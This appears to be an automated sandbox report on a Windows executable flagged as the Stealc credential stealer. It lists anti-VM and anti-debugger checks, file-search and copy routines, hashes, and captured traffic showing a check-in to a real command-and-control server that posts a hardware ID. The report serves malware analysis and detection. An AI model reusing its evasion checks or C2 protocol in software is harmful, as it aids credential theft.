                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ED4910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00ECDA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00ECE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00ED4570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00ECED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00EC16D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00ED3EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ECF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECF68A FindFirstFileA | 0_2_00ECF68A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00ECBE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ECDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00ECDE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC1160 GetSystemInfo,ExitProcess | 0_2_00EC1160
                Source: file.exe, file.exe, 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2157800068.0000000001BE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWxR
                Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareU
                Source: file.exe, 00000000.00000002.2157800068.0000000001BE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13649
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13652
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13704
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13669
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13664
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00EC45C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00ED9860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9750 mov eax, dword ptr fs:[00000030h] | 0_2_00ED9750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_00ED78E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6172, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00ED9600
                Source: file.exe, file.exe, 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Q?Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00ED7B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00ED7980
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00ED7850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ED7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00ED7A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6172, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.ec0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6172, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the figure the report shows beside that technique)
                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
                Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
                Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
                Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
                Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
                Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
                Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
                Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
                Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                               No contacted domains info
                               Name | Malicious | Antivirus Detection / Reputation
                               http://185.215.113.37/ | true | unknown
                               http://185.215.113.37/e2b1563c6670f193.php | true | unknown
                               Name | Source | Malicious | Antivirus Detection / Reputation
                               http://185.215.113.37/e2b1563c6670f193.php. | file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp | false | unknown
                               http://185.215.113.37p | file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | false | unknown
                               http://185.215.113.37 | file.exe, 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp | true | unknown
                               http://185.215.113.37/6t | file.exe, 00000000.00000002.2157800068.0000000001BB2000.00000004.00000020.00020000.00000000.sdmp | false | unknown
                               http://185.215.113.37/e2b1563c6670f193.phpZ | file.exe, 00000000.00000002.2157800068.0000000001BC6000.00000004.00000020.00020000.00000000.sdmp | false | unknown
                               IP | Domain | Country | ASN | ASN Name | Malicious
                               185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1520589
                              Start date and time:2024-09-27 16:16:08 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                               Number of new started processes analysed:2
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 84
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              No simulations
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                               185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                               No context
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               WHOLESALECONNECTIONSNL | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.103
                               WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                               No context
                               No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.94802208537805
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'875'456 bytes
                              MD5:ad0c6bd7353136531af5325034613533
                              SHA1:ee44d2b2e6ad3e32da9c074b5b880e4947c4970c
                              SHA256:5947b0b670dbb94778390c83aeb091874f10cb952b2dc3c459ac0e23f380a523
                              SHA512:4173f1abc677aa4a17b1947d3c9c164817e7c35f3b9240842861e0babfaba02751f11fda52eee544d62e6a5b3226ac32d1561cf0e2071eede671a18ed956a85a
                              SSDEEP:24576:D6wf7cLoJNPpd/jAsGyco0dBBgnXxTrOyIhfX0nI3ZGASsQjipNuDpNv28EGFZ2K:Dl7GcTSsG72x+ysfX/psGpkp86bFX
                              TLSH:C19533926D43F2F6EDC26771B553AA8E6235DFC479261D54288B8C0C247392FF4DC82A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xab4000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 39e9fb59c0c24bb828f43320b8178d91 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               (unnamed) | 0x25e000 | 0x2b1000 | 0x200 | 9acee5a36eab5b91d33884dd252fed27 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               llbyxbem | 0x50f000 | 0x1a4000 | 0x1a3a00 | 91aad5711e47847d04b720b369740ae9 | False | 0.9949982080354484 | data | 7.9547357115051796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               vndwcpmt | 0x6b3000 | 0x1000 | 0x600 | 763fa978514f11211415d40d3e140f6f | False | 0.5611979166666666 | data | 4.9508808550480135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .taggant | 0x6b4000 | 0x3000 | 0x2200 | 032398fe2d5a0a7180ad8285bc630ef7 | False | 0.07410386029411764 | DOS executable (COM) | 0.77590994190649 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               DLL | Import
                               kernel32.dll | lstrcpy
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-09-27T16:17:12.173171+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Sep 27, 2024 16:17:10.785897017 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:10.797452927 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:10.797525883 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:10.797700882 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:10.802763939 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:11.500509977 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:11.500602961 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:11.503679037 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:11.508725882 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:12.173007011 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:12.173171043 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:12.174293041 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:12.174386978 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:12.174649954 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                               Sep 27, 2024 16:17:12.174702883 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                               Sep 27, 2024 16:17:15.301161051 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                              • 185.215.113.37
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 6172 | C:\Users\user\Desktop\file.exe
                               Timestamp | Bytes transferred | Direction | Data
                               Sep 27, 2024 16:17:10.797700882 CEST | 89 | OUT | GET / HTTP/1.1
                               Host: 185.215.113.37
                               Connection: Keep-Alive
                               Cache-Control: no-cache
                               Sep 27, 2024 16:17:11.500509977 CEST | 203 | IN | HTTP/1.1 200 OK
                               Date: Fri, 27 Sep 2024 14:17:11 GMT
                               Server: Apache/2.4.52 (Ubuntu)
                               Content-Length: 0
                               Keep-Alive: timeout=5, max=100
                               Connection: Keep-Alive
                               Content-Type: text/html; charset=UTF-8
                               Sep 27, 2024 16:17:11.503679037 CEST | 411 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                               Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID
                               Host: 185.215.113.37
                               Content-Length: 210
                               Connection: Keep-Alive
                               Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 35 37 35 30 39 34 33 44 30 42 36 31 32 33 33 31 37 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a
                               Data Ascii (multipart body, line breaks restored from the raw bytes above):
                               ------JKECFCFBGDHIECAAFIID
                               Content-Disposition: form-data; name="hwid"

                               CF5750943D0B612331747
                               ------JKECFCFBGDHIECAAFIID
                               Content-Disposition: form-data; name="build"

                               save
                               ------JKECFCFBGDHIECAAFIID--
                               Sep 27, 2024 16:17:12.173007011 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Fri, 27 Sep 2024 14:17:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                               Data Ascii: YmxvY2s= (base64 of the string "block")
                               Sep 27, 2024 16:17:12.174293041 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Fri, 27 Sep 2024 14:17:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                               Data Ascii: YmxvY2s= (base64 of the string "block")
                               Sep 27, 2024 16:17:12.174649954 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Fri, 27 Sep 2024 14:17:11 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                               Data Ascii: YmxvY2s= (base64 of the string "block")



                              Target ID:0
                              Start time:10:17:05
                              Start date:27/09/2024
                              Path:C:\Users\user\Desktop\file.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\file.exe"
                              Imagebase:0xec0000
                              File size:1'875'456 bytes
                              MD5 hash:AD0C6BD7353136531AF5325034613533
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2157800068.0000000001B6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2105603461.0000000005650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:24
